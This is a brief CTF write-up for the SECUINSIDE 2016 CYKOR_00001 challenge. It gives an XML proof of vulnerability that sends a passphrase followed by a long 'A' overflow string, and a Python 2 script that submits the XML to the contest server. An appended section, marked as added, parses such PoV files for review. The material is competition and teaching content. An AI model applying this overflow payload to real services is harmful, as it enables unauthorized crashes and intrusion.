SECUINSIDE 2016 CYKOR_00001
CTF 2016. 7. 10. 22:04
Please read the previous post before this one; the binary is the same.
This time the exploit is delivered by sending it as XML.
<?xml version="1.0" standalone="no" ?>
<!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd">
<pov>
<cbid>service</cbid>
<replay>
<read><delim>\x0a</delim><match><data>What is your message?\x0a</data></match></read>
<write><data>H4PPY_S3CUINSID3\x0a</data></write>
<read><delim>\x0a</delim><match><data>+ Are you serious?\x0a</data></match></read>
<write><data>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0a</data></write>
<read><delim>\x0a</delim><match><data>- Why so serious?\x0a</data></match></read>
</replay>
</pov>
# Python 2 script that submits the XML PoV above to the challenge server
from socket import *
from telnetlib import *

HOST = "cgc.cykor.kr"
PORT = 31324

def recvuntil(t):
    # Read one byte at a time until the expected prompt has arrived
    data = ''
    while not data.endswith(t):
        tmp = s.recv(1)
        if not tmp:
            break
        data += tmp
    return data

s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
payload = open("cykor1.xml", "rb").read()

print recvuntil("What type of your PoV? (BIN / XML)")
s.send("XML\n")
print recvuntil("How many bytes is your XML?")
s.send("671\n")  # size declared to the server for the XML
print recvuntil("Ok.... send it :)")
print len(payload)
s.send(payload + "\n")

# Hand the socket over to an interactive session
t = Telnet()
t.sock = s
t.interact()
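Added example, not part of the original post: a small Python 3 parser that decodes a replay-style PoV like the XML above into its read/write steps, so the expected prompts and the size of each write can be reviewed before the file is replayed. The sample XML is constructed in the same layout as the post's PoV; the function names, the 160-byte filler and the 64-byte limit are assumptions made for the example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the same replay layout as the PoV in the post.
# The filler length (160) is an assumption chosen for this example.
SAMPLE_POV = (
    rb'<?xml version="1.0" standalone="no" ?>' b"\n"
    rb'<!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd">' b"\n"
    rb"<pov><cbid>service</cbid><replay>"
    rb"<read><delim>\x0a</delim><match><data>What is your message?\x0a</data></match></read>"
    rb"<write><data>H4PPY_S3CUINSID3\x0a</data></write>"
    rb"<read><delim>\x0a</delim><match><data>+ Are you serious?\x0a</data></match></read>"
    rb"<write><data>" + b"A" * 160 + rb"\x0a</data></write>"
    rb"<read><delim>\x0a</delim><match><data>- Why so serious?\x0a</data></match></read>"
    rb"</replay></pov>"
)

_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def unescape(text):
    """Convert the backslash-x hex escapes used inside <data> into raw bytes."""
    decoded = _HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text or "")
    return decoded.encode("latin-1")


def pov_steps(xml_bytes):
    """Return [(tag, data_bytes), ...] for each child of <replay>, in order."""
    root = ET.fromstring(xml_bytes)  # the external DTD is not fetched
    steps = []
    for node in root.find("replay"):
        data = b"".join(unescape(d.text) for d in node.iter("data"))
        steps.append((node.tag, data))
    return steps


def oversized_writes(steps, limit):
    """List (step_index, length) for every write longer than `limit` bytes."""
    return [(i, len(d)) for i, (tag, d) in enumerate(steps)
            if tag == "write" and len(d) > limit]


if __name__ == "__main__":
    for index, (tag, data) in enumerate(pov_steps(SAMPLE_POV)):
        print(index, tag, len(data), data[:32])
    print("writes over 64 bytes:", oversized_writes(pov_steps(SAMPLE_POV), 64))
```
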